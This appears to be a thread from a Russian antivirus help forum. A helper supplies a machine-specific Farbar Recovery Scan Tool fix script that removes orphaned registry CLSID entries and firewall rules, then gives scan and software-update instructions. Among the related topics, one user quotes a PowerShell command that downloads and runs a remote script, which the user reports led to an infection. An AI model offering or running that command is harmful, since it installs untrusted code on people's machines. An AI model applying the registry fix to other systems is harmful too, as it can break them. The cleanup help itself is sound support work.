CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{912F8D58-2141-48F7-A302-0E1FB170283C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9393C393-C594-49A6-B23B-DA10A5962313}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{95EB7FA8-A76F-4DC9-8139-8ED3AD8ECF65}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{96FF122A-F22C-4A1A-A4B0-40B99E84FE73}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{991E0034-F05D-4E9F-BB77-8D5764FBE2B6}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9B123B52-A4A0-4CE1-9389-99608660326A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9B4FFBB7-A9A6-45B0-8C60-807F58E39008}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9CB99683-BCE8-42EF-87E0-28AD83B400CB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9EA0B7CD-B3AF-480A-8409-C9BA4ECEAB8E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9EE6493A-473A-4698-960E-82505A104E45}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{9FCCDB89-83DC-4431-ADF3-B77A94109E7D}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A01567B6-E648-40BA-86DF-92D28A761544}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A09B9D47-75B0-487B-B468-8B576BACBEEA}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A1180A3C-A136-497A-9CF8-5EA72F6AA7A2}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A14E2CBA-A647-425D-AD36-16A504F354DF}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A218E6A7-15CA-47F9-87B4-AAC2043BCF2B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A2E44B0B-11F6-455B-AFFC-A46BCD1184A1}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A318EBE6-0796-4CEE-89A3-D62012765A33}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A6085C88-E1CE-4542-AA0F-52C88CA62E6E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A6A5BBFD-83AF-4812-B945-D1C6E3F2EF83}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A760C2C2-1A3C-48A8-8B28-742E3520AA56}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A80BF260-8DC0-4F5F-95EF-F969B81C256B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{A83C39E3-6D93-4150-9B9F-2D682C38E8B4}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AA875EED-E5A5-4D08-A0DF-39CB11201F27}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AABA8228-AF0F-4032-B728-49023DFA6523}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AC2F6BA5-873B-41F0-ACAC-19653277A728}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{AEC6E32D-AF86-49C3-A1F9-5C34C4FD51BB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B6141600-140E-4820-8A25-3858E2DDD79A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B7DD785E-64ED-4BF2-B473-400BA294B096}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B8456B12-E863-4380-B37E-F03DEF658953}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B84D0888-9CA5-4A12-828E-29216C486126}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B86A7B0B-998D-4B94-8BA7-843DA969E1DC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B86EFD19-7EC7-46CF-8786-39DE6DEC48C3}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{B88990C2-4D7B-427F-B9D0-27CF7F0F1917}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{BA0AA4AC-C5E4-494B-A7D6-4F8EC345B413}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{BD1C1F61-789E-499B-9097-FC7C0EA49C6C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{BD21C0FE-ED8F-4FD3-97F6-01849523CC93}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C0F9FC52-4C1B-4078-A9FB-889D655655ED}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C25AFEB5-0FF4-4DA9-8956-71DB1FE2EEC8}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C3EE6319-7277-49FC-8EDE-0AE3D1E2C911}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C4E0AB99-8443-44E8-AAE7-2A8200ACF692}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C5295FFB-DAE1-4361-AC96-789041BBCD66}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C64EB020-FE53-4C53-99FF-9AA2F302FA10}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{C6B38D30-8236-4AA3-AC8B-EEA5E1F0F9A5}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CA473827-C1B1-4382-995C-E9C93A7AF94B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{cadc4b84-0da0-42bc-b309-d4f3e20213ae}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CB066B69-6C99-4CD6-B1FE-39A937E91770}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CBE10065-702B-4A16-BBD4-D2046A202C38}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CBE2A803-A396-4E0C-AD89-470865BBEE41}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CC2542AB-386F-4BF6-972F-73037BBA93D6}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CCFAFFBA-2675-4FA8-B71A-693CDE9FA843}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{CDF9A529-469D-4FF1-B6AB-FD81B617A72C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D0427B9F-DE04-40D4-A31A-23A1724C56ED}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D13ECD95-AD3C-4007-B2B9-E74FF3FE0757}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D2C54083-2EA2-443C-8094-E29EC26FD73A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D3A879D7-336D-475F-A896-382AA121E30A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D845777E-7DE6-4F2D-9EF5-30CB8EE0B1C7}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D88D6DA1-FD0B-42FC-B304-14978F173EC9}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{D96771C9-2440-4654-AC2E-262EA631B601}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DA01C88D-3F5F-407C-BF9A-777275B65124}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DC5C2497-97B0-4D40-93DD-4870E6413ABA}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DCDCA1C1-4C6A-4382-BCFC-E557750CE2AC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{DCDD3BEA-1A66-431F-ADCB-FAEBB64BB01E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{E4734B94-5B4C-4952-AB5A-09AECF8010B2}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{E907DE1B-C1E3-4586-8E1A-7B9568850026}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EBDDF7EF-BA1C-4891-970C-D506A70CC12B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{ED2A88F2-332A-47FD-AF21-E43836E904CC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EE0D621A-6FEF-4BFE-97E3-0B4B8A0E50E0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EEEE1816-C285-42BC-A44D-2F18EF54BDC2}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{EFD469AF-B401-4D23-BB7F-DFDB5C80AA72}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F3D75CD7-2E9A-421E-92E2-0F48D3C7DB73}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F3F47E45-D676-4D07-A483-98E5B026EE17}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F42B0F31-F464-4E7F-9B02-5C595DD03D7E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F46AAFD0-C9C9-400F-A9E1-EB97C742C240}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F4810E07-D17B-4672-BE55-79249BA88F3F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F4CE19C5-678A-49D4-A06E-991F65A273CD}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F70B79F4-58AB-40F8-8B3F-9630E302CD5B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F7280F89-A31B-40DA-BD43-3E588ED8394C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{F8CAD947-0366-4D47-83F5-6D65FF353B72}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FABFBA06-C426-49AF-9B89-6645D988CDC9}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FD47A6DC-FB82-47F2-8C06-3A9C40BE0FBB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FD82EFE8-5868-461D-9419-18BDCBB95A82}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FDAE11E1-5F03-4BE7-945A-21ED2BB5D3DF}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FE0912D2-2329-44B0-A156-D7EBDF7947FB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{FF2557E6-1F96-4013-92B8-639C1F395DB7}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
FirewallRules: [{704F28B2-2464-44BA-93EB-D56AA55A3C55}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => Нет файла
FirewallRules: [{18E7F388-09FA-4F90-9759-8FB88A461900}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
thyrex

thyrex

Опубликовано
Опубликовано

Загрузите SecurityCheck by glax24 & Severnyj и сохраните архив на Рабочем столе.

  • Разархивируйте, запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
  • Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
  • Прикрепите этот файл в своем следующем сообщении.


 
thyrex

thyrex

Опубликовано
Опубликовано

По возможности исправьте:

 

AnyDesk v.ad 6.1.0 Внимание! Скачать обновления
TeamViewer v.15.13.6 Внимание! Скачать обновления
Microsoft Office - профессиональный выпуск версии 2003 v.11.0.6361.0 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
WinRAR 6.00 бета 2 (64-разрядная) v.6.00.2 Внимание! Скачать обновления
ICQ (версия 23.2.0.48119) v.23.2.0.48119 Данная программа больше не поддерживается разработчиком.
Adobe Acrobat (64-bit) v.25.001.20630 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - Проверить обновления!^
360 Extreme Browser v.22.3.5080.64 Браузер был установлен в составе другого ПО. Рекомендуется деинсталлировать его и использовать Google Chrome, Brave или Vivaldi.
Yandex v.25.8.0.1908 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
Google Chrome v.139.0.7258.154 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О браузере Google Chrome!^
The Bat! v9.3.0.2 (64-bit) v.9.3.0.2 Внимание! Скачать обновления


---------------------------- [ UnwantedApps ] -----------------------------
Кнопки сервисов Яндекса на панели задач v.3.7.9.0 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
 

На этом закончим.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Кашапова Алина
      [РЕШЕНО] Вирус powershell AVKill 10
      Автор Кашапова Алина
      Здравствуйте. Подхватила вирус, источник неизвестен, но возможно вместе с торрентом. Ноутбук сильно шумит и греется, диспетчер задач показывает загруженность ЦП 100%. Cureit сначала указывал на файлы dialer.exe в \net\18308\tcp, после перезагрузки их не видит, но нашел powershell AVKill 10. Удалить файлы не получается. Заранее благодарю за помощь.
      CollectionLog-2025.09.01-01.06.zip
    • Andrei93
      Как исправить причину блокировки выполнения скрипта ?
      Автор Andrei93
      Здравствуйте.
       
      Я выполняю powershell скрипт с помощью планировщика задач от системы
       
      1. Скрипт подписан сертификатом.
      2. Скрипт выполняет установку msi плагина для Outlook.
       
      KSC считает, что это троян.
       
      - По какой причине ?
      - Как правильно разрешить мою проблему ?
       
      Kasperskiy Endpoint Security: 12.3.0.493
       
       
       


    • SimpleMan
      Помогите устранить вирус который засел в PowerShell
      Автор SimpleMan
      Недавно активировал Windows 11 Pro через командную строку cmd, через какой-то левый KMS сервер, не разобрался как это работает, 
      проработал так несколько дней, потом решил установить антивирус Касперского и он сразу же обнаружил Вредоносные ссылки через PowerShell 
      пример такой активаций есть везде, вот: https://vk.com/wall-188198781_5982
      Подскажите пожалуйста, как теперь устранить проблему?
      скриншот отчёта прилагаю
       
    • VanyeJ
      Вирус в PowerShell
      Автор VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
    • mrTomny
      PowerShell пытается перекинуть на вредоносную ссылку
      Автор mrTomny
      Вопрос не решился? у меня такая же проблема вылезла....
      инфо.txt
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
×
×
  • Создать...